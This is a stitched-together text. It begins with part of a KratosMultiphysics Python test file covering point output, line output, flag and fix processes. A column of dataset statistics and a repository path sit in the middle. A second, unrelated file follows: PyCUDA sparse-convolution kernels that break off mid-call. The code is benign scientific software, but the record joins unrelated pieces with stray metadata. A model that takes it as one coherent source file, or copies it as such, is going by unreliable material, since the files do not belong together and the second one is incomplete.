"assign_vector_by_direction_to_condition_process", "kratos_module" : "KratosMultiphysics", "process_name" : "AssignVectorByDirectionToConditionProcess", "Parameters" : { "model_part_name" : "Main", "variable_name" : "DISPLACEMENT", "modulus" : "2.0*t-y", "direction" : [1.0,0.0,0.0], "interval" : [0.0,"End"] } } ] } """) import process_factory list_of_processes = process_factory.KratosProcessFactory(current_model).ConstructListOfProcesses( settings["process_list"] ) ################### here we are within the interval model_part.CloneTimeStep(3.0) for process in list_of_processes: process.ExecuteInitializeSolutionStep() for cond in model_part.Conditions: tmp = cond.GetValue(DISPLACEMENT) self.assertEqual(tmp[0], 2.0*3.0-0.75) self.assertEqual(tmp[1], 0.0) self.assertEqual(tmp[2], 0.0) for process in list_of_processes: process.ExecuteFinalizeSolutionStep() ################### here we are outside of the interval - values do not change but everything is free model_part.CloneTimeStep(8.0) for process in list_of_processes: process.ExecuteInitializeSolutionStep() for cond in model_part.Conditions: tmp = cond.GetValue(DISPLACEMENT) self.assertEqual(tmp[0], 2.0*8.0-0.75) self.assertEqual(tmp[1], 0.0) self.assertEqual(tmp[2], 0.0) for process in list_of_processes: process.ExecuteFinalizeSolutionStep() def test_point_output_process_node(self): current_model = Model() model_part = current_model.CreateModelPart("Main") model_part.AddNodalSolutionStepVariable(DISPLACEMENT) model_part.AddNodalSolutionStepVariable(ACCELERATION) model_part.AddNodalSolutionStepVariable(VISCOSITY) model_part_io = ModelPartIO(GetFilePath("test_processes")) model_part_io.ReadModelPart(model_part) reference_file_name = GetFilePath("point_output_process_ref_files/node_output_ref.dat") # Here we also test if the output to folder(s) (and subfolder(s)) works settings = Parameters("""{ "process_list" : [ { "python_module" : "point_output_process", "kratos_module" : "KratosMultiphysics", "process_name" : "PointOutputProcess", "Parameters" : { "position" : [0.5, 0.25, 0.0], "model_part_name" : "Main", "output_file_settings": { "file_name" : "node_output", "folder_name" : "test_parent_folder/test_subfolder" }, "output_variables" : ["DISPLACEMENT", "VISCOSITY", "ACCELERATION"], "entity_type" : "node" } },{ "python_module" : "compare_two_files_check_process", "kratos_module" : "KratosMultiphysics", "process_name" : "CompareTwoFilesCheckProcess", "Parameters" : { "reference_file_name" : "", "output_file_name" : "test_parent_folder/test_subfolder/node_output.dat", "comparison_type" : "dat_file" } } ] }""") settings["process_list"][1]["Parameters"]["reference_file_name"].SetString(reference_file_name) end_time = 5.0 delta_time = 0.15 model_part.ProcessInfo[TIME] = 0.0 SolutionLoopPointOutputProcesses(model_part, settings, end_time, delta_time) kratos_utils.DeleteDirectoryIfExisting("test_parent_folder") def test_point_output_process_element(self): current_model = Model() model_part = current_model.CreateModelPart("Main") model_part.AddNodalSolutionStepVariable(DISPLACEMENT) model_part.AddNodalSolutionStepVariable(ACCELERATION) model_part.AddNodalSolutionStepVariable(VISCOSITY) model_part_io = ModelPartIO(GetFilePath("test_processes")) model_part_io.ReadModelPart(model_part) reference_file_name = GetFilePath("point_output_process_ref_files/element_output_ref.dat") settings = Parameters("""{ "process_list" : [ { "python_module" : "point_output_process", "kratos_module" : "KratosMultiphysics", "process_name" : "PointOutputProcess", "Parameters" : { "position" : [0.563, 0.89, 0.0], "model_part_name" : "Main", "output_file_settings": { "file_name" : "element_output" }, "output_variables" : ["DISPLACEMENT_X", "VISCOSITY", "ACCELERATION"] } },{ "python_module" : "compare_two_files_check_process", "kratos_module" : "KratosMultiphysics", "process_name" : "CompareTwoFilesCheckProcess", "Parameters" : { "reference_file_name" : "", "output_file_name" : "element_output.dat", "comparison_type" : "dat_file" } } ] }""") settings["process_list"][1]["Parameters"]["reference_file_name"].SetString(reference_file_name) end_time = 5.0 delta_time = 0.15 model_part.ProcessInfo[TIME] = 0.0 model_part.ProcessInfo[DOMAIN_SIZE] = 3 SolutionLoopPointOutputProcesses(model_part, settings, end_time, delta_time) def test_point_output_process_condition(self): current_model = Model() model_part = current_model.CreateModelPart("Main") model_part.AddNodalSolutionStepVariable(DISPLACEMENT) model_part.AddNodalSolutionStepVariable(ACCELERATION) model_part.AddNodalSolutionStepVariable(VISCOSITY) model_part_io = ModelPartIO(GetFilePath("test_model_part_io_read")) model_part_io.ReadModelPart(model_part) reference_file_name = GetFilePath("point_output_process_ref_files/condition_output_ref.dat") # Here we also test if setting the write_buffer_size works settings = Parameters("""{ "process_list" : [ { "python_module" : "point_output_process", "kratos_module" : "KratosMultiphysics", "process_name" : "PointOutputProcess", "Parameters" : { "position" : [16.0, 0.2, 0.0], "model_part_name" : "Main", "output_file_settings": { "file_name" : "condition_output", "write_buffer_size" : 512 }, "output_variables" : ["DISPLACEMENT", "VISCOSITY", "ACCELERATION"], "entity_type" : "condition" } },{ "python_module" : "compare_two_files_check_process", "kratos_module" : "KratosMultiphysics", "process_name" : "CompareTwoFilesCheckProcess", "Parameters" : { "reference_file_name" : "", "output_file_name" : "condition_output.dat", "comparison_type" : "dat_file" } } ] }""") settings["process_list"][1]["Parameters"]["reference_file_name"].SetString(reference_file_name) end_time = 5.0 delta_time = 0.15 model_part.ProcessInfo[TIME] = 0.0 model_part.ProcessInfo[DOMAIN_SIZE] = 2 SolutionLoopPointOutputProcesses(model_part, settings, end_time, delta_time) def test_point_output_process_restart(self): current_model = Model() model_part = current_model.CreateModelPart("Main") model_part.AddNodalSolutionStepVariable(DISPLACEMENT) model_part.AddNodalSolutionStepVariable(ACCELERATION) model_part.AddNodalSolutionStepVariable(VISCOSITY) model_part_io = ModelPartIO(GetFilePath("test_processes")) model_part_io.ReadModelPart(model_part) reference_file_name = GetFilePath("point_output_process_ref_files/node_output_ref.dat") # note that we are comparing the same file as for without restart settings = Parameters("""{ "process_list" : [ { "python_module" : "point_output_process", "kratos_module" : "KratosMultiphysics", "process_name" : "PointOutputProcess", "Parameters" : { "position" : [0.5, 0.25, 0.0], "model_part_name" : "Main", "output_file_settings": { "file_name" : "point_output_rest" }, "output_variables" : ["DISPLACEMENT", "VISCOSITY", "ACCELERATION"], "entity_type" : "node" } },{ "python_module" : "compare_two_files_check_process", "kratos_module" : "KratosMultiphysics", "process_name" : "CompareTwoFilesCheckProcess", "Parameters" : { "reference_file_name" : "", "output_file_name" : "point_output_rest.dat", "comparison_type" : "dat_file" } } ] }""") settings["process_list"][1]["Parameters"]["reference_file_name"].SetString(reference_file_name) # From this file we copy some lines into a new file , which will be used as basis for the restart ref_file_name = settings["process_list"][1]["Parameters"]["reference_file_name"].GetString() ref_file_name = os.path.abspath(ref_file_name) # making it work independent of OS # here we create a dat file from a "previous run" out_file_name = settings["process_list"][0]["Parameters"]["output_file_settings"]["file_name"].GetString() out_file_name += ".dat" with open(ref_file_name, 'r') as ref_file, open(out_file_name, 'w') as out_file: for line in ref_file: out_file.write(line) if line.startswith("3.15"): # the previous run "stopped" at T=3.1 break model_part.ProcessInfo[IS_RESTARTED] = True model_part.ProcessInfo[TIME] = 2.1 # the new run "starts" at T=2.1 end_time = 5.0 delta_time = 0.15 SolutionLoopPointOutputProcesses(model_part, settings, end_time, delta_time) def test_point_output_process_restart_with_restart_time_no_found(self): current_model = Model() model_part = current_model.CreateModelPart("Main") model_part.AddNodalSolutionStepVariable(DISPLACEMENT) model_part.AddNodalSolutionStepVariable(ACCELERATION) model_part.AddNodalSolutionStepVariable(VISCOSITY) model_part_io = ModelPartIO(GetFilePath("test_processes")) model_part_io.ReadModelPart(model_part) reference_file_name = GetFilePath("point_output_process_ref_files/node_output_restart_time_not_found_ref.dat") # note that we are comparing the same file as for without restart settings = Parameters("""{ "process_list" : [ { "python_module" : "point_output_process", "kratos_module" : "KratosMultiphysics", "process_name" : "PointOutputProcess", "Parameters" : { "position" : [0.5, 0.25, 0.0], "model_part_name" : "Main", "output_file_settings": { "file_name" : "point_output_restart_time_not_found" }, "output_variables" : ["DISPLACEMENT", "VISCOSITY", "ACCELERATION"], "entity_type" : "node" } },{ "python_module" : "compare_two_files_check_process", "kratos_module" : "KratosMultiphysics", "process_name" : "CompareTwoFilesCheckProcess", "Parameters" : { "reference_file_name" : "", "output_file_name" : "point_output_restart_time_not_found.dat", "comparison_type" : "dat_file" } } ] }""") settings["process_list"][1]["Parameters"]["reference_file_name"].SetString(reference_file_name) # From this file we copy some lines into a new file , which will be used as basis for the restart ref_file_name = settings["process_list"][1]["Parameters"]["reference_file_name"].GetString() ref_file_name = os.path.abspath(ref_file_name) # making it work independent of OS # here we create a dat file from a "previous run" out_file_name = settings["process_list"][0]["Parameters"]["output_file_settings"]["file_name"].GetString() out_file_name += ".dat" with open(ref_file_name, 'r') as ref_file, open(out_file_name, 'w') as out_file: for line in ref_file: out_file.write(line) if line.startswith("3.15"): # the previous run "stopped" at T=3.1 break model_part.ProcessInfo[IS_RESTARTED] = True model_part.ProcessInfo[TIME] = 2.15 # the new run "starts" at T=2.15, wich will not match any value end_time = 5.0 delta_time = 0.15 SolutionLoopPointOutputProcesses(model_part, settings, end_time, delta_time) def test_point_output_process_failed_restart(self): current_model = Model() model_part = current_model.CreateModelPart("Main") model_part.AddNodalSolutionStepVariable(DISPLACEMENT) model_part.AddNodalSolutionStepVariable(ACCELERATION) model_part.AddNodalSolutionStepVariable(VISCOSITY) model_part_io = ModelPartIO(GetFilePath("test_processes")) model_part_io.ReadModelPart(model_part) # Delete the file in case it is leftover from a previous test kratos_utils.DeleteFileIfExisting("node_output_failed_restart.dat") reference_file_name = GetFilePath("point_output_process_ref_files/node_output_failed_restart_ref.dat") settings = Parameters("""{ "process_list" : [ { "python_module" : "point_output_process", "kratos_module" : "KratosMultiphysics", "process_name" : "PointOutputProcess", "Parameters" : { "position" : [0.5, 0.25, 0.0], "model_part_name" : "Main", "output_file_settings": { "file_name" : "node_output_failed_restart" }, "output_variables" : ["DISPLACEMENT", "VISCOSITY", "ACCELERATION"], "entity_type" : "node" } },{ "python_module" : "compare_two_files_check_process", "kratos_module" : "KratosMultiphysics", "process_name" : "CompareTwoFilesCheckProcess", "Parameters" : { "reference_file_name" : "", "output_file_name" : "node_output_failed_restart.dat", "comparison_type" : "dat_file" } } ] }""") settings["process_list"][1]["Parameters"]["reference_file_name"].SetString(reference_file_name) end_time = 5.0 delta_time = 0.15 # "fake" a restart model_part.ProcessInfo[IS_RESTARTED] = True model_part.ProcessInfo[TIME] = 2.1 SolutionLoopPointOutputProcesses(model_part, settings, end_time, delta_time) def test_multiple_point_output_process(self): current_model = Model() model_part = current_model.CreateModelPart("Main") model_part.AddNodalSolutionStepVariable(DISPLACEMENT) model_part.AddNodalSolutionStepVariable(ACCELERATION) model_part.AddNodalSolutionStepVariable(VISCOSITY) model_part_io = ModelPartIO(GetFilePath("test_processes")) model_part_io.ReadModelPart(model_part) reference_file_name_1 = GetFilePath("point_output_process_ref_files/node_output_1_ref.dat") reference_file_name_2 = GetFilePath("point_output_process_ref_files/node_output_2_ref.dat") reference_file_name_3 = GetFilePath("point_output_process_ref_files/node_output_3_ref.dat") settings = Parameters("""{ "process_list" : [ { "python_module" : "multiple_points_output_process", "kratos_module" : "KratosMultiphysics", "process_name" : "MultiplePointsOutputProcess", "Parameters" : { "positions" : [[0.5, 0.0, 0.0], [0.25, 0.5, 0.0], [1.0, 0.0, 0.0]], "model_part_name" : "Main", "output_file_settings": { "file_name" : "node_output" }, "output_variables" : ["DISPLACEMENT", "VISCOSITY", "ACCELERATION"], "entity_type" : "node" } },{ "python_module" : "compare_two_files_check_process", "kratos_module" : "KratosMultiphysics", "process_name" : "CompareTwoFilesCheckProcess", "Parameters" : { "reference_file_name" : "", "output_file_name" : "node_output_1.dat", "comparison_type" : "dat_file" } } ,{ "python_module" : "compare_two_files_check_process", "kratos_module" : "KratosMultiphysics", "process_name" : "CompareTwoFilesCheckProcess", "Parameters" : { "reference_file_name" : "", "output_file_name" : "node_output_2.dat", "comparison_type" : "dat_file" } } ,{ "python_module" : "compare_two_files_check_process", "kratos_module" : "KratosMultiphysics", "process_name" : "CompareTwoFilesCheckProcess", "Parameters" : { "reference_file_name" : "", "output_file_name" : "node_output_3.dat", "comparison_type" : "dat_file" } } ] }""") settings["process_list"][1]["Parameters"]["reference_file_name"].SetString(reference_file_name_1) settings["process_list"][2]["Parameters"]["reference_file_name"].SetString(reference_file_name_2) settings["process_list"][3]["Parameters"]["reference_file_name"].SetString(reference_file_name_3) end_time = 5.0 delta_time = 0.15 model_part.ProcessInfo[TIME] = 0.0 SolutionLoopPointOutputProcesses(model_part, settings, end_time, delta_time) def test_line_output_process(self): current_model = Model() model_part = current_model.CreateModelPart("Main") model_part.AddNodalSolutionStepVariable(DISPLACEMENT) model_part.AddNodalSolutionStepVariable(ACCELERATION) model_part.AddNodalSolutionStepVariable(VISCOSITY) model_part_io = ModelPartIO(GetFilePath("test_processes")) model_part_io.ReadModelPart(model_part) reference_file_name_1 = GetFilePath("point_output_process_ref_files/line_output_1_ref.dat") reference_file_name_2 = GetFilePath("point_output_process_ref_files/line_output_2_ref.dat") reference_file_name_3 = GetFilePath("point_output_process_ref_files/line_output_3_ref.dat") settings = Parameters("""{ "process_list" : [ { "python_module" : "line_output_process", "kratos_module" : "KratosMultiphysics", "process_name" : "LineOutputProcess", "Parameters" : { "start_point" : [0.0, 0.1, 0.0], "end_point" : [0.9, 0.5, 0.0], "model_part_name" : "Main", "output_file_settings": { "file_name" : "line_output" }, "output_variables" : ["DISPLACEMENT", "VISCOSITY", "ACCELERATION"] } },{ "python_module" : "compare_two_files_check_process", "kratos_module" : "KratosMultiphysics", "process_name" : "CompareTwoFilesCheckProcess", "Parameters" : { "reference_file_name" : "", "output_file_name" : "line_output_1.dat", "comparison_type" : "dat_file" } } ,{ "python_module" : "compare_two_files_check_process", "kratos_module" : "KratosMultiphysics", "process_name" : "CompareTwoFilesCheckProcess", "Parameters" : { "reference_file_name" : "", "output_file_name" : "line_output_2.dat", "comparison_type" : "dat_file" } }, { "python_module" : "compare_two_files_check_process", "kratos_module" : "KratosMultiphysics", "process_name" : "CompareTwoFilesCheckProcess", "Parameters" : { "reference_file_name" : "", "output_file_name" : "line_output_3.dat", "comparison_type" : "dat_file" } }] }""") settings["process_list"][1]["Parameters"]["reference_file_name"].SetString(reference_file_name_1) settings["process_list"][2]["Parameters"]["reference_file_name"].SetString(reference_file_name_2) settings["process_list"][3]["Parameters"]["reference_file_name"].SetString(reference_file_name_3) model_part.ProcessInfo[DOMAIN_SIZE] = 3 end_time = 5.0 delta_time = 0.15 model_part.ProcessInfo[TIME] = 0.0 SolutionLoopPointOutputProcesses(model_part, settings, end_time, delta_time) def test_assign_flag_process(self): current_model = Model() model_part = current_model.CreateModelPart("Main") model_part_io = ModelPartIO(GetFilePath("test_processes")) model_part_io.ReadModelPart(model_part) settings = Parameters("""{ "process_list" : [ { "python_module" : "assign_flag_process", "kratos_module" : "KratosMultiphysics", "process_name" : "AssignFlagProcess", "Parameters" : { "mesh_id" : 0, "model_part_name" : "Main", "flag_name" : "ACTIVE", "value" : true, "entities" : ["nodes","elements"] } }] }""") import process_factory list_of_processes = process_factory.KratosProcessFactory(current_model).ConstructListOfProcesses( settings["process_list"] ) model_part.CloneTimeStep(1.0) for process in list_of_processes: process.ExecuteInitializeSolutionStep() ##verify the result for node in model_part.Nodes: self.assertEqual(node.Is(ACTIVE), True) for cond in model_part.Conditions: self.assertEqual(cond.Is(ACTIVE), False) for elem in model_part.Elements: self.assertEqual(elem.Is(ACTIVE), True) def test_fix_processes(self): current_model = Model() model_part = current_model.CreateModelPart("Main") model_part.AddNodalSolutionStepVariable(DISPLACEMENT) model_part.AddNodalSolutionStepVariable(VELOCITY) model_part.AddNodalSolutionStepVariable(VISCOSITY) model_part.AddNodalSolutionStepVariable(DENSITY) model_part_io = ModelPartIO(GetFilePath("test_model_part_io_read")) model_part_io.ReadModelPart(model_part) #reset all data for node in model_part.Nodes: node.Free(DISPLACEMENT_X) node.Free(DISPLACEMENT_Y) node.Free(DISPLACEMENT_Z) node.Free(VELOCITY_X) node.Free(VELOCITY_Y) node.Free(VELOCITY_Z) node.SetSolutionStepValue(DENSITY,0,0.0) node.SetSolutionStepValue(VISCOSITY,0,0.0) node.SetSolutionStepValue(DISPLACEMENT_X,0,0.0) node.SetSolutionStepValue(DISPLACEMENT_Y,0,0.0) node.SetSolutionStepValue(DISPLACEMENT_Z,0,0.0) node.SetSolutionStepValue(VELOCITY_X,0,0.0) node.SetSolutionStepValue(VELOCITY_Y,0,0.0) node.SetSolutionStepValue(VELOCITY_Z,0,0.0) settings = Parameters( """ { "process_list" : [ { "python_module" : "fix_scalar_variable_process", "kratos_module" : "KratosMultiphysics", "process_name" : "FixScalarVariableProcess", "Parameters" : { "model_part_name" : "Main", "variable_name" : "VISCOSITY", "interval" : [1.0, 2.0], "constrained" : true } }, { "python_module" : "fix_scalar_variable_process", "kratos_module" : "KratosMultiphysics", "process_name" : "FixScalarVariableProcess", "Parameters" : { "model_part_name" : "Main", "variable_name" : "DENSITY", "interval" : [3.0, 1e30] } }, { "python_module" : "fix_scalar_variable_process", "kratos_module" : "KratosMultiphysics", "process_name" : "FixScalarVariableProcess", "Parameters" : { "model_part_name" : "Main", "variable_name" : "DISPLACEMENT_X", "constrained" : true } }, { "python_module" : "fix_vector_variable_process", "kratos_module" : "KratosMultiphysics", "process_name" : "FixVectorVariableProcess", "Parameters" : { "model_part_name" : "Main", "variable_name" : "DISPLACEMENT" } }, { "python_module" : "fix_vector_variable_process", "kratos_module" : "KratosMultiphysics", "process_name" : "FixVectorVariableProcess", "Parameters" : { "model_part_name" : "Main", "variable_name" : "VELOCITY", "constrained" : [false, true, true] } } ] } """ ) import process_factory list_of_processes = process_factory.KratosProcessFactory(current_model).ConstructListOfProcesses( settings["process_list"] ) for node in model_part.Nodes: self.assertFalse(node.IsFixed(DISPLACEMENT_X)) self.assertFalse(node.IsFixed(DISPLACEMENT_Y)) self.assertFalse(node.IsFixed(DISPLACEMENT_Z)) ############################################################ ##time = 1 - all active except DENSITY model_part.CloneTimeStep(1.0) for process in list_of_processes: process.ExecuteInitializeSolutionStep() ##verify the result for node in model_part.Nodes: self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_X), 0.0) self.assertEqual(node.GetSolutionStepValue(VELOCITY_X), 0.0) self.assertEqual(node.GetSolutionStepValue(DENSITY), 0.0) self.assertEqual(node.GetSolutionStepValue(VISCOSITY), 0.0) self.assertFalse(node.IsFixed(DENSITY)) self.assertTrue(node.IsFixed(VISCOSITY)) self.assertTrue(node.IsFixed(DISPLACEMENT_X)) self.assertTrue(node.IsFixed(DISPLACEMENT_Y)) self.assertTrue(node.IsFixed(DISPLACEMENT_Z)) self.assertFalse(node.IsFixed(VELOCITY_X)) self.assertTrue(node.IsFixed(VELOCITY_Y)) self.assertTrue(node.IsFixed(VELOCITY_Z)) for process in list_of_processes: process.ExecuteFinalizeSolutionStep() ##verify the result for node in model_part.Nodes: self.assertFalse(node.IsFixed(DENSITY)) self.assertFalse(node.IsFixed(VISCOSITY)) self.assertFalse(node.IsFixed(DISPLACEMENT_X)) self.assertFalse(node.IsFixed(DISPLACEMENT_Y)) self.assertFalse(node.IsFixed(DISPLACEMENT_Z)) self.assertFalse(node.IsFixed(VELOCITY_X)) self.assertFalse(node.IsFixed(VELOCITY_Y)) self.assertFalse(node.IsFixed(VELOCITY_Z)) ############################################################ ##time = 3 - all active except VISCOSITY model_part.CloneTimeStep(3.0) for node in model_part.Nodes: self.assertFalse(node.IsFixed(VELOCITY_X)) self.assertFalse(node.IsFixed(VELOCITY_Y)) self.assertFalse(node.IsFixed(VELOCITY_Z)) for process in list_of_processes: process.ExecuteInitializeSolutionStep() ##verify the result for node in model_part.Nodes: self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_X), 0.0) self.assertEqual(node.GetSolutionStepValue(VELOCITY_X), 0.0) self.assertEqual(node.GetSolutionStepValue(DENSITY), 0.0) self.assertEqual(node.GetSolutionStepValue(VISCOSITY), 0.0) self.assertTrue(node.IsFixed(DENSITY)) self.assertFalse(node.IsFixed(VISCOSITY)) self.assertTrue(node.IsFixed(DISPLACEMENT_X)) self.assertTrue(node.IsFixed(DISPLACEMENT_Y)) self.assertTrue(node.IsFixed(DISPLACEMENT_Z)) self.assertFalse(node.IsFixed(VELOCITY_X)) self.assertTrue(node.IsFixed(VELOCITY_Y)) self.assertTrue(node.IsFixed(VELOCITY_Z)) for process in list_of_processes: process.ExecuteFinalizeSolutionStep() ##verify the result for node in model_part.Nodes: self.assertFalse(node.IsFixed(DENSITY)) self.assertFalse(node.IsFixed(VISCOSITY)) self.assertFalse(node.IsFixed(DISPLACEMENT_X)) self.assertFalse(node.IsFixed(DISPLACEMENT_Y)) self.assertFalse(node.IsFixed(DISPLACEMENT_Z)) self.assertFalse(node.IsFixed(VELOCITY_X)) self.assertFalse(node.IsFixed(VELOCITY_Y)) self.assertFalse(node.IsFixed(VELOCITY_Z)) def SetNodalValuesForPointOutputProcesses(model_part): time = model_part.ProcessInfo[TIME] vec = Vector(3) for node in model_part.Nodes: vec[0] = round(math.sqrt(node.X**2+node.Y**2)*time ,6) vec[1] = round(node.X**2+node.Y**2 + time ,6) vec[2] = round(node.X+node.Y + time ,6) node.SetSolutionStepValue(DISPLACEMENT, vec) node.SetSolutionStepValue(ACCELERATION, vec*time) node.SetSolutionStepValue(VISCOSITY, time**2 + 1.038) def SolutionLoopPointOutputProcesses(model_part, settings, end_time, delta_time): current_model = model_part.GetModel() import process_factory list_of_processes = process_factory.KratosProcessFactory(current_model).ConstructListOfProcesses( settings["process_list"] ) for process in list_of_processes: process.ExecuteInitialize() for process in list_of_processes: process.ExecuteBeforeSolutionLoop() while model_part.ProcessInfo[TIME] < end_time: model_part.ProcessInfo[TIME] += delta_time SetNodalValuesForPointOutputProcesses(model_part) for process in list_of_processes: process.ExecuteInitializeSolutionStep() for process in list_of_processes: process.ExecuteBeforeOutputStep() for process in list_of_processes: process.ExecuteAfterOutputStep() for process in list_of_processes: process.ExecuteFinalizeSolutionStep() for process in list_of_processes: process.ExecuteFinalize() if __name__ == '__main__': KratosUnittest.main()
47.069106
147
0.522627
5,837
69,474
5.953572
0.053623
0.063451
0.04374
0.041898
0.91606
0.896118
0.877442
0.858536
0.850508
0.835026
0
0.015193
0.380387
69,474
1,475
148
47.101017
0.792064
0.039108
0
0.783051
0
0
0.308368
0.06225
0
0
0
0
0.19887
0
null
null
0
0.019209
null
null
0.00113
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
8
81d47d43c69df7d316d6873c44a20f70f0c60d38
22,639
py
Python
sparse_conv.py
BoFeng2477/E4750-Project-APPN
5ddb8a693a7f4cc2503e978f7fcf971dfc189609
[ "MIT" ]
null
null
null
sparse_conv.py
BoFeng2477/E4750-Project-APPN
5ddb8a693a7f4cc2503e978f7fcf971dfc189609
[ "MIT" ]
null
null
null
sparse_conv.py
BoFeng2477/E4750-Project-APPN
5ddb8a693a7f4cc2503e978f7fcf971dfc189609
[ "MIT" ]
null
null
null
import numpy as np import time from scipy import signal import pycuda.autoinit import pycuda.driver as cuda from pycuda.compiler import SourceModule from SparsityAnalysis import extract_patterns, SparseConvArrays import torch.nn as nn import torch from conv_naive import Convolution from tqdm import tqdm class SparseConvolution: def __init__(self): """ Attributes for instance of EncoderDecoder module """ self.mod = self.getSourceModule() pass def getSourceModule(self): # kernel code wrapper kernelwrapper = """ #define BLOCK_WIDTH 4 #define CONSTANT_SIZE 16384 __constant__ float Weight[CONSTANT_SIZE]; __global__ void sparse_conv_naive(float *data, int *offset, int *reorder, int *index, int *stride, float *weight, float *ptset, float *out, int bn, int IC, int IH, int IW, int OC, int OH, int OW, int ptset_size, int non_zero, int mask_width, int step) { int filter_idx = blockIdx.x * blockDim.x + threadIdx.x; int row = blockIdx.y * blockDim.y + threadIdx.y; int col = blockIdx.z * blockDim.z + threadIdx.z; int output_index = bn * OC * OH * OW + reorder[filter_idx] * OH * OW + row * OW + col; //int tx = threadIdx.x; //int ty = threadIdx.y; //int tz = threadIdx.z; if(filter_idx < OC){ int topleft_col = col * step - ((mask_width - 1) / 2); int topleft_row = row * step - ((mask_width - 1) / 2); int oc_stride_start = filter_idx * (ptset_size + 1); float output = 0; for(int pi = 0; pi < ptset_size; pi++){ int stride_index = oc_stride_start + pi; int nkernels = stride[stride_index + 1] - stride[stride_index]; int kernel_index_start = offset[filter_idx] + stride[stride_index]; for(int k = 0; k < nkernels; k++){ int topleft_data_index = bn * IC * IH * IW + index[kernel_index_start + k] * IH * IW + topleft_row * IW + topleft_col; for(int v = 0; v < non_zero; v++){ int cur_row = topleft_row + ptset[pi * non_zero * 2 + v * 2 + 0]; int cur_col = topleft_col + ptset[pi * non_zero * 2 + v * 2 + 1]; int cur_index = topleft_data_index + ptset[pi * non_zero * 2 + v * 2 + 0] * IW + ptset[pi * non_zero * 2 + v * 2 + 1]; //out[output_index] = ptset[pi * non_zero * 2 + v * 2 + 0]; if(cur_row >= 0 && cur_row < IH && cur_col >=0 && cur_col < IW){ output += data[cur_index] * weight[non_zero * (kernel_index_start + k) + v]; } } } } out[output_index] = output; } } __global__ void sparse_conv_shared(float *data, int *offset, int *reorder, int *index, int *stride, float *weight, float *ptset, float *out, int bn, int IC, int IH, int IW, int OC, int OH, int OW, int ptset_size, int non_zero, int mask_width, int step) { int filter_idx = blockIdx.x * blockDim.x + threadIdx.x; int row = blockIdx.y * blockDim.y + threadIdx.y; int col = blockIdx.z * blockDim.z + threadIdx.z; int output_index = bn * OC * OH * OW + reorder[filter_idx] * OH * OW + row * OW + col; int tx = threadIdx.x; int ty = threadIdx.y; int tz = threadIdx.z; __shared__ float output[BLOCK_WIDTH][BLOCK_WIDTH][BLOCK_WIDTH]; output[tz][ty][tx] = 0; if(filter_idx < OC){ int topleft_col = col * step - ((mask_width - 1) / 2); int topleft_row = row * step - ((mask_width - 1) / 2); int oc_stride_start = filter_idx * (ptset_size + 1); for(int pi = 0; pi < ptset_size; pi++){ int stride_index = oc_stride_start + pi; int nkernels = stride[stride_index + 1] - stride[stride_index]; int kernel_index_start = offset[filter_idx] + stride[stride_index]; for(int k = 0; k < nkernels; k++){ int topleft_data_index = bn * IC * IH * IW + index[kernel_index_start + k] * IH * IW + topleft_row * IW + topleft_col; for(int v = 0; v < non_zero; v++){ int cur_row = topleft_row + ptset[pi * non_zero * 2 + v * 2 + 0]; int cur_col = topleft_col + ptset[pi * non_zero * 2 + v * 2 + 1]; int cur_index = topleft_data_index + ptset[pi * non_zero * 2 + v * 2 + 0] * IW + ptset[pi * non_zero * 2 + v * 2 + 1]; //out[output_index] = ptset[pi * non_zero * 2 + v * 2 + 0]; if(cur_row >= 0 && cur_row < IH && cur_col >=0 && cur_col < IW){ output[tz][ty][tx] += data[cur_index] * weight[non_zero * (kernel_index_start + k) + v]; } } } } out[output_index] = output[tz][ty][tx]; } } __global__ void sparse_conv_shared_constant(float *data, int *offset, int *reorder, int *index, int *stride, float *ptset, float *out, int bn, int IC, int IH, int IW, int OC, int OH, int OW, int ptset_size, int non_zero, int mask_width, int step) { int filter_idx = blockIdx.x * blockDim.x + threadIdx.x; int row = blockIdx.y * blockDim.y + threadIdx.y; int col = blockIdx.z * blockDim.z + threadIdx.z; int output_index = bn * OC * OH * OW + reorder[filter_idx] * OH * OW + row * OW + col; int tx = threadIdx.x; int ty = threadIdx.y; int tz = threadIdx.z; __shared__ float output[BLOCK_WIDTH][BLOCK_WIDTH][BLOCK_WIDTH]; output[tz][ty][tx] = 0; if(filter_idx < OC){ int topleft_col = col * step - ((mask_width - 1) / 2); int topleft_row = row * step - ((mask_width - 1) / 2); int oc_stride_start = filter_idx * (ptset_size + 1); for(int pi = 0; pi < ptset_size; pi++){ int stride_index = oc_stride_start + pi; int nkernels = stride[stride_index + 1] - stride[stride_index]; int kernel_index_start = offset[filter_idx] + stride[stride_index]; for(int k = 0; k < nkernels; k++){ int topleft_data_index = bn * IC * IH * IW + index[kernel_index_start + k] * IH * IW + topleft_row * IW + topleft_col; for(int v = 0; v < non_zero; v++){ int cur_row = topleft_row + ptset[pi * non_zero * 2 + v * 2 + 0]; int cur_col = topleft_col + ptset[pi * non_zero * 2 + v * 2 + 1]; int cur_index = topleft_data_index + ptset[pi * non_zero * 2 + v * 2 + 0] * IW + ptset[pi * non_zero * 2 + v * 2 + 1]; //out[output_index] = ptset[pi * non_zero * 2 + v * 2 + 0]; if(cur_row >= 0 && cur_row < IH && cur_col >=0 && cur_col < IW){ output[tz][ty][tx] += data[cur_index] * Weight[non_zero * (kernel_index_start + k) + v]; } } } } out[output_index] = output[tz][ty][tx]; } } """ # you can either use a string or save the kernel in kernel.cu file and reference it here. # Compile the kernel code when an instance # of this class is made. return SourceModule(kernelwrapper) def conv_sparse_naive(self, data, offset, reorder, index, stride, weight, ptset, step, out): BN, IC, IH, IW = data.shape _, OC, OH, OW = out.shape mask_width = 3 pattern_set_size = ptset.shape[0] nonzero_per_kernel = ptset.shape[1] block_width = 4 block_dim = (block_width, block_width, block_width) grid_dim = ((OC - 1) // block_width + 1, (OH - 1) // block_width + 1, (OW - 1) // block_width + 1) time_computation_start = cuda.Event() time_computation_end = cuda.Event() time_mem_transfer_start = cuda.Event() time_mem_transfer_end = cuda.Event() time_mem_transfer_start.record() data_d = cuda.mem_alloc(data.nbytes) offset_d = cuda.mem_alloc(offset.nbytes) reorder_d = cuda.mem_alloc(reorder.nbytes) index_d = cuda.mem_alloc(index.nbytes) stride_d = cuda.mem_alloc(stride.nbytes) weight_d = cuda.mem_alloc(weight.nbytes) ptset_d = cuda.mem_alloc(ptset.nbytes) out_d = cuda.mem_alloc(out.nbytes) do_conv_sparse = self.mod.get_function("sparse_conv_naive") cuda.memcpy_htod(data_d, 